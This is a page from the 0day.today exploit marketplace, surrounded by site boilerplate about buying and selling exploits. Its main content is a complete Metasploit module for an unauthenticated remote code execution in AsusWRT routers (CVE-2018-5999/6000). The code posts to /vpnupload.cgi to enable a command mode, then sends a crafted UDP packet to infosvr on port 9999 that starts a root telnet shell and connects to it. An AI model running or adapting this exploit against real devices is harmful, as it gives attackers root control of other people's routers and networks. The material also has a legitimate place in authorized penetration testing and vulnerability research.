0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
AsusWRT LAN Unauthenticated Remote Code Execution Exploit
Author
Risk
[
Security Risk Critical
]0day-ID
Category
Date add
CVE
Platform
## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::Udp def initialize(info = {}) super(update_info(info, 'Name' => 'AsusWRT LAN Unauthenticated Remote Code Execution', 'Description' => %q{ The HTTP server in AsusWRT has a flaw where it allows an unauthenticated client to perform a POST in certain cases. This can be combined with another vulnerability in the VPN configuration upload routine that sets NVRAM configuration variables directly from the POST request to enable a special command mode. This command mode can then be abused by sending a UDP packet to infosvr, which is running on port UDP 9999 to directly execute commands as root. This exploit leverages that to start telnetd in a random port, and then connects to it. It has been tested with the RT-AC68U running AsusWRT Version 3.0.0.4.380.7743. }, 'Author' => [ 'Pedro Ribeiro <pedrib@gmail.com>' # Vulnerability discovery and Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['URL', 'https://blogs.securiteam.com/index.php/archives/3589'], ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/asuswrt-lan-rce.txt'], ['URL', 'http://seclists.org/fulldisclosure/2018/Jan/78'], ['CVE', '2018-5999'], ['CVE', '2018-6000'] ], 'Targets' => [ [ 'AsusWRT < v3.0.0.4.384.10007', { 'Payload' => { 'Compat' => { 'PayloadType' => 'cmd_interact', 'ConnectionType' => 'find', }, }, } ], ], 'Privileged' => true, 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, 'DisclosureDate' => 'Jan 22 2018', 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(9999) ]) register_advanced_options( [ OptInt.new('ASUSWRTPORT', [true, 'AsusWRT HTTP portal port', 80]) ]) end def exploit # first we set the ateCommand_flag variable to 1 to allow PKT_SYSCMD # this attack can also be used to overwrite the web interface password and achieve RCE by enabling SSH and rebooting! post_data = Rex::MIME::Message.new post_data.add_part('1', content_type = nil, transfer_encoding = nil, content_disposition = "form-data; name=\"ateCommand_flag\"") data = post_data.to_s res = send_request_cgi({ 'uri' => "/vpnupload.cgi", 'method' => 'POST', 'rport' => datastore['ASUSWRTPORT'], 'data' => data, 'ctype' => "multipart/form-data; boundary=#{post_data.bound}" }) if res and res.code == 200 print_good("#{peer} - Successfully set the ateCommand_flag variable.") else fail_with(Failure::Unknown, "#{peer} - Failed to set ateCommand_flag variable.") end # ... but we like to do it more cleanly, so let's send the PKT_SYSCMD as described in the comments above. info_pdu_size = 512 # expected packet size, not sure what the extra bytes are r = Random.new ibox_comm_pkt_hdr_ex = [0x0c].pack('C*') + # NET_SERVICE_ID_IBOX_INFO 0xC [0x15].pack('C*') + # NET_PACKET_TYPE_CMD 0x15 [0x33,0x00].pack('C*') + # NET_CMD_ID_MANU_CMD 0x33 r.bytes(4) + # Info, don't know what this is r.bytes(6) + # MAC address r.bytes(32) # Password telnet_port = rand((2**16)-1024)+1024 cmd = "/usr/sbin/telnetd -l /bin/sh -p #{telnet_port}" + [0x00].pack('C*') pkt_syscmd = [cmd.length,0x00].pack('C*') + # cmd length cmd # our command pkt_final = ibox_comm_pkt_hdr_ex + pkt_syscmd + r.bytes(info_pdu_size - (ibox_comm_pkt_hdr_ex + pkt_syscmd).length) connect_udp udp_sock.put(pkt_final) # we could process the response, but we don't care disconnect_udp print_status("#{peer} - Packet sent, let's sleep 10 seconds and try to connect to the router on port #{telnet_port}") sleep(10) begin ctx = { 'Msf' => framework, 'MsfExploit' => self } sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnet_port, 'Context' => ctx, 'Timeout' => 10 }) if not sock.nil? print_good("#{peer} - Success, shell incoming!") return handler(sock) end rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e sock.close if sock end print_bad("#{peer} - Well that didn't work... try again?") end end # 0day.today [2024-12-25] #